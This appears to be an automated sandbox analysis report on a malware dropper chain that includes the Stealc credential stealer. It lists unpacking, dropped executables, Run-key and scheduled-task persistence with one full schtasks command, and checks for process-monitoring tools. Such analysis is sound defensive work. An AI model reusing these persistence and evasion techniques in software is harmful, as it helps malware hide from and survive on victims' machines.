Source:	Binary string: mozglue.pdbP source: stealc_default2.exe, 00000011.00000002.2209960916.000000006D1DD000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: nss3.pdb@ source: stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: nss3.pdb source: stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: mozglue.pdb source: stealc_default2.exe, 00000011.00000002.2209960916.000000006D1DD000.00000002.00000001.01000000.0000000E.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 6.2.file.exe.a00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mahfbdtk:EW;akwexcdv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mahfbdtk:EW;akwexcdv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 9.2.axplong.exe.c50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mahfbdtk:EW;akwexcdv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mahfbdtk:EW;akwexcdv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 10.2.axplong.exe.c50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mahfbdtk:EW;akwexcdv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mahfbdtk:EW;akwexcdv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 13.2.axplong.exe.c50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mahfbdtk:EW;akwexcdv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mahfbdtk:EW;akwexcdv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Unpacked PE file: 42.2.550b7cfe5f.exe.a70000.0.unpack :EW;.rsrc :W;.idata :W;wrsfsivy:EW;bfxftgti:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;wrsfsivy:EW;bfxftgti:EW;.taggant:EW;

.NET source code contains potential unpacker

Source: 33.2.f55899dae2.exe.1c770000.2.raw.unpack, searchX64LPVOIDhierarchy.cs	.Net Code: WaitDelegatesetLatencyMode
Source: 33.0.f55899dae2.exe.59408e.1.raw.unpack, searchX64LPVOIDhierarchy.cs	.Net Code: WaitDelegatesetLatencyMode

Source: random[1].exe0.13.dr

Static PE information: 0x9C4597AB [Wed Jan 29 23:35:07 2053 UTC]

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 17_2_00789860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

17_2_00789860

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: shop[1].exe.13.dr	Static PE information: real checksum: 0x0 should be: 0xa36fe
Source: shop.exe.13.dr	Static PE information: real checksum: 0x0 should be: 0xa36fe
Source: c8908bf20d.exe.13.dr	Static PE information: real checksum: 0x2142c2 should be: 0x2115c3
Source: GOLD1234.exe.13.dr	Static PE information: real checksum: 0x0 should be: 0xacdea
Source: 5C4X2NVYNV2E9BIIRWD89LJFJIM.exe.22.dr	Static PE information: real checksum: 0x2a786b should be: 0x2a96e2
Source: random[1].exe0.13.dr	Static PE information: real checksum: 0x0 should be: 0x86b26
Source: AAKAL78BRQNYOCIR09Y.exe.22.dr	Static PE information: real checksum: 0x1df3c9 should be: 0x1dd90c
Source: 550b7cfe5f.exe.13.dr	Static PE information: real checksum: 0x2ecf7f should be: 0x2e75f0
Source: axplong.exe.6.dr	Static PE information: real checksum: 0x1d48a6 should be: 0x1dd6b2
Source: random[1].exe1.13.dr	Static PE information: real checksum: 0x2ecf7f should be: 0x2e75f0
Source: f55899dae2.exe.13.dr	Static PE information: real checksum: 0x0 should be: 0x86b26
Source: random[2].exe.13.dr	Static PE information: real checksum: 0x2142c2 should be: 0x2115c3
Source: random[1].exe.13.dr	Static PE information: real checksum: 0x2bfef4 should be: 0x2c40af
Source: stealc_default2.exe.13.dr	Static PE information: real checksum: 0x0 should be: 0x516aa
Source: RDX123456[1].exe.13.dr	Static PE information: real checksum: 0x0 should be: 0x5876f
Source: GOLD1234[1].exe.13.dr	Static PE information: real checksum: 0x0 should be: 0xacdea
Source: stealc_default2[1].exe.13.dr	Static PE information: real checksum: 0x0 should be: 0x516aa
Source: RDX123456.exe.13.dr	Static PE information: real checksum: 0x0 should be: 0x5876f
Source: Application.exe.33.dr	Static PE information: real checksum: 0x0 should be: 0x86b26
Source: file.exe	Static PE information: real checksum: 0x1d48a6 should be: 0x1dd6b2
Source: 2dc588f7b5.exe.13.dr	Static PE information: real checksum: 0x2bfef4 should be: 0x2c40af

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: mahfbdtk
Source: file.exe	Static PE information: section name: akwexcdv
Source: file.exe	Static PE information: section name: .taggant
Source: axplong.exe.6.dr	Static PE information: section name:
Source: axplong.exe.6.dr	Static PE information: section name: .idata
Source: axplong.exe.6.dr	Static PE information: section name:
Source: axplong.exe.6.dr	Static PE information: section name: mahfbdtk
Source: axplong.exe.6.dr	Static PE information: section name: akwexcdv
Source: axplong.exe.6.dr	Static PE information: section name: .taggant
Source: random[2].exe.13.dr	Static PE information: section name:
Source: random[2].exe.13.dr	Static PE information: section name: .rsrc
Source: random[2].exe.13.dr	Static PE information: section name: .idata
Source: random[2].exe.13.dr	Static PE information: section name:
Source: random[2].exe.13.dr	Static PE information: section name: cbbjugzk
Source: random[2].exe.13.dr	Static PE information: section name: lfmofsyx
Source: random[2].exe.13.dr	Static PE information: section name: .taggant
Source: c8908bf20d.exe.13.dr	Static PE information: section name:
Source: c8908bf20d.exe.13.dr	Static PE information: section name: .rsrc
Source: c8908bf20d.exe.13.dr	Static PE information: section name: .idata
Source: c8908bf20d.exe.13.dr	Static PE information: section name:
Source: c8908bf20d.exe.13.dr	Static PE information: section name: cbbjugzk
Source: c8908bf20d.exe.13.dr	Static PE information: section name: lfmofsyx
Source: c8908bf20d.exe.13.dr	Static PE information: section name: .taggant
Source: random[1].exe.13.dr	Static PE information: section name:
Source: random[1].exe.13.dr	Static PE information: section name: .idata
Source: random[1].exe.13.dr	Static PE information: section name: wjqxmzgq
Source: random[1].exe.13.dr	Static PE information: section name: xobrrexd
Source: random[1].exe.13.dr	Static PE information: section name: .taggant
Source: 2dc588f7b5.exe.13.dr	Static PE information: section name:
Source: 2dc588f7b5.exe.13.dr	Static PE information: section name: .idata
Source: 2dc588f7b5.exe.13.dr	Static PE information: section name: wjqxmzgq
Source: 2dc588f7b5.exe.13.dr	Static PE information: section name: xobrrexd
Source: 2dc588f7b5.exe.13.dr	Static PE information: section name: .taggant
Source: Offnewhere[1].exe.13.dr	Static PE information: section name: .eh_fram
Source: Offnewhere.exe.13.dr	Static PE information: section name: .eh_fram
Source: new_v8[1].exe.13.dr	Static PE information: section name: .vmp+
Source: new_v8[1].exe.13.dr	Static PE information: section name: .vmp+
Source: new_v8[1].exe.13.dr	Static PE information: section name: .vmp+
Source: new_v8.exe.13.dr	Static PE information: section name: .vmp+
Source: new_v8.exe.13.dr	Static PE information: section name: .vmp+
Source: new_v8.exe.13.dr	Static PE information: section name: .vmp+
Source: random[1].exe1.13.dr	Static PE information: section name:
Source: random[1].exe1.13.dr	Static PE information: section name: .rsrc
Source: random[1].exe1.13.dr	Static PE information: section name: .idata
Source: random[1].exe1.13.dr	Static PE information: section name: wrsfsivy
Source: random[1].exe1.13.dr	Static PE information: section name: bfxftgti
Source: random[1].exe1.13.dr	Static PE information: section name: .taggant
Source: 550b7cfe5f.exe.13.dr	Static PE information: section name:
Source: 550b7cfe5f.exe.13.dr	Static PE information: section name: .rsrc
Source: 550b7cfe5f.exe.13.dr	Static PE information: section name: .idata
Source: 550b7cfe5f.exe.13.dr	Static PE information: section name: wrsfsivy
Source: 550b7cfe5f.exe.13.dr	Static PE information: section name: bfxftgti
Source: 550b7cfe5f.exe.13.dr	Static PE information: section name: .taggant
Source: GOLD1234[1].exe.13.dr	Static PE information: section name: .00cfg
Source: GOLD1234[1].exe.13.dr	Static PE information: section name: .call
Source: GOLD1234.exe.13.dr	Static PE information: section name: .00cfg
Source: GOLD1234.exe.13.dr	Static PE information: section name: .call
Source: shop[1].exe.13.dr	Static PE information: section name: .00cfg
Source: shop.exe.13.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.17.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.17.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.17.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.17.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.17.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.17.dr	Static PE information: section name: .didat
Source: nss3.dll.17.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.17.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.17.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.17.dr	Static PE information: section name: .00cfg
Source: TPKOcaeSvfBbrcMznKuF.dll.18.dr	Static PE information: section name: .eh_fram
Source: service123.exe.18.dr	Static PE information: section name: .eh_fram
Source: 5C4X2NVYNV2E9BIIRWD89LJFJIM.exe.22.dr	Static PE information: section name:
Source: 5C4X2NVYNV2E9BIIRWD89LJFJIM.exe.22.dr	Static PE information: section name: .idata
Source: 5C4X2NVYNV2E9BIIRWD89LJFJIM.exe.22.dr	Static PE information: section name: cfyesryy
Source: 5C4X2NVYNV2E9BIIRWD89LJFJIM.exe.22.dr	Static PE information: section name: gwntuilp
Source: 5C4X2NVYNV2E9BIIRWD89LJFJIM.exe.22.dr	Static PE information: section name: .taggant
Source: AAKAL78BRQNYOCIR09Y.exe.22.dr	Static PE information: section name:
Source: AAKAL78BRQNYOCIR09Y.exe.22.dr	Static PE information: section name: .idata
Source: AAKAL78BRQNYOCIR09Y.exe.22.dr	Static PE information: section name:
Source: AAKAL78BRQNYOCIR09Y.exe.22.dr	Static PE information: section name: edfilslq
Source: AAKAL78BRQNYOCIR09Y.exe.22.dr	Static PE information: section name: gprpjvtr
Source: AAKAL78BRQNYOCIR09Y.exe.22.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 13_2_00C6D84C push ecx; ret	13_2_00C6D85F
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 13_2_00CA1694 push edi; retf	13_2_00CA1696
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_0078B035 push ecx; ret	17_2_0078B048

Source: file.exe	Static PE information: section name: entropy: 7.9851176619482
Source: file.exe	Static PE information: section name: mahfbdtk entropy: 7.953063770644612
Source: axplong.exe.6.dr	Static PE information: section name: entropy: 7.9851176619482
Source: axplong.exe.6.dr	Static PE information: section name: mahfbdtk entropy: 7.953063770644612
Source: random[2].exe.13.dr	Static PE information: section name: cbbjugzk entropy: 7.953118561919161
Source: c8908bf20d.exe.13.dr	Static PE information: section name: cbbjugzk entropy: 7.953118561919161
Source: random[1].exe.13.dr	Static PE information: section name: entropy: 7.983838861531346
Source: 2dc588f7b5.exe.13.dr	Static PE information: section name: entropy: 7.983838861531346
Source: random[1].exe0.13.dr	Static PE information: section name: .text entropy: 7.82060659626259
Source: f55899dae2.exe.13.dr	Static PE information: section name: .text entropy: 7.82060659626259
Source: random[1].exe1.13.dr	Static PE information: section name: entropy: 7.981756320370339
Source: 550b7cfe5f.exe.13.dr	Static PE information: section name: entropy: 7.981756320370339
Source: GOLD1234[1].exe.13.dr	Static PE information: section name: .text entropy: 7.010787961155337
Source: GOLD1234.exe.13.dr	Static PE information: section name: .text entropy: 7.010787961155337
Source: shop[1].exe.13.dr	Static PE information: section name: .text entropy: 7.0240622903518135
Source: shop.exe.13.dr	Static PE information: section name: .text entropy: 7.0240622903518135
Source: 5C4X2NVYNV2E9BIIRWD89LJFJIM.exe.22.dr	Static PE information: section name: entropy: 7.80234292244424
Source: AAKAL78BRQNYOCIR09Y.exe.22.dr	Static PE information: section name: entropy: 7.984163692603841
Source: AAKAL78BRQNYOCIR09Y.exe.22.dr	Static PE information: section name: edfilslq entropy: 7.954585037030609
Source: Application.exe.33.dr	Static PE information: section name: .text entropy: 7.82060659626259

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	File created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\shop[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\splwow64[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	File created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File created: C:\Users\user\AppData\Local\Temp\5C4X2NVYNV2E9BIIRWD89LJFJIM.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	File created: C:\ProgramData\LgAmARwZ\Application.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\Offnewhere[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1001471001\c8908bf20d.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1001472001\2dc588f7b5.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\new_v8[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\GOLD1234[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	File created: C:\Users\user\AppData\Local\Temp\service123.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	File created: C:\Users\user\AppData\Local\Temp\TPKOcaeSvfBbrcMznKuF.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File created: C:\Users\user\AppData\Local\Temp\AAKAL78BRQNYOCIR09Y.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\RDX123456[1].exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	File created: C:\ProgramData\LgAmARwZ\Application.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c8908bf20d.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2dc588f7b5.exe			Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F

Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LgAmARwZ.url

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Windows\System32\svchost.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Config

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LgAmARwZ.url
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c8908bf20d.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c8908bf20d.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2dc588f7b5.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2dc588f7b5.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

17_2_00789860

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
